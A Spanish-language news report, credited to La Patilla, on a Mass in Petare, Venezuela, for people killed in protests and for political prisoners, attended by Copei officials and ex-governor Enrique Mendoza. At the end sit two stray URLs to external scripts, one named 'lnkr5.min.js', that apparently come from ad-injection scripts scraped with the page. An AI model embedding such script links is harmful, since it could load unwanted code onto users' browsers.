Acompañados por el ex – Gobernador del Estado Miranda, Enrique Mendoza, el Comité Municipal de Copei Sucre, representado por su directiva Gikly Villarroel, Arnaldo Santana, José de Aponte y Euridice del Valle Guerra, el Presidente de Copei en Guarenas, Gersón Arocha, familiares y amigos, y una masiva asistencia de los vecinos de Petare, ofrecieron una misa por todos los héroes caídos en las protestas en Venezuela, y la libertad de los presos políticos, destacando el lamentable caso ocurrido con el Diputado de la Asamblea Nacional, Juan Requesens.

Con un pendón en memoria del joven Neomar Lander adyacente al altar, en esta Santa Eucaristía, se mencionaron los nombres de todos los fallecidos en las diferentes protestas, así como también de todos los presos políticos que aún permanecen tras las rejas. La misa estuvo presidida por el Presbítero de la Parroquia “Dulce Nombre de Jesús”, de la zona colonial de Petare, Ángel Infante, con la participación de las diferentes pastorales que sirven en esta iglesia.

Con un emotivo mensaje de fe y esperanza el Párroco Ángel Infante, en su homilía, llamó a los feligreses que no desmayen en la oración por la paz y la reconciliación de todos los venezolanos, por los enfermos, por los que tienen hambre, así como también por los que hoy sufren las inundaciones producto de las fuertes lluvias, en las diferentes regiones del país. Recalcó que Venezuela necesita de la lucha de todos, unidos, para superar las dificultades que se viven.

Por su parte,   Mendoza destacó que lo que no podamos lograr los venezolanos de pie, lo alcanzaremos de rodillas, elevando nuestras plegarias a Dios y a la Virgen de Coromoto, Patrona de Venezuela, a propósito que el próximo 11 de septiembre se cumplen 366 años de su aparición en Venezuela, y aprovechó la oportunidad para invitar a los vecinos al acompañamiento de estas festividades religiosas en todo el país, frente a las adversidades que se padecen y elevar nuestra oraciones en busca de la paz que solo se logrará a través de un cambio en Venezuela sin violencia y sin odio.

VÍA LA PATILLA.

 

https://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=51824x6748x&r=1534604108672https://permissnew.com/addons/lnkr5.min.js

Loading...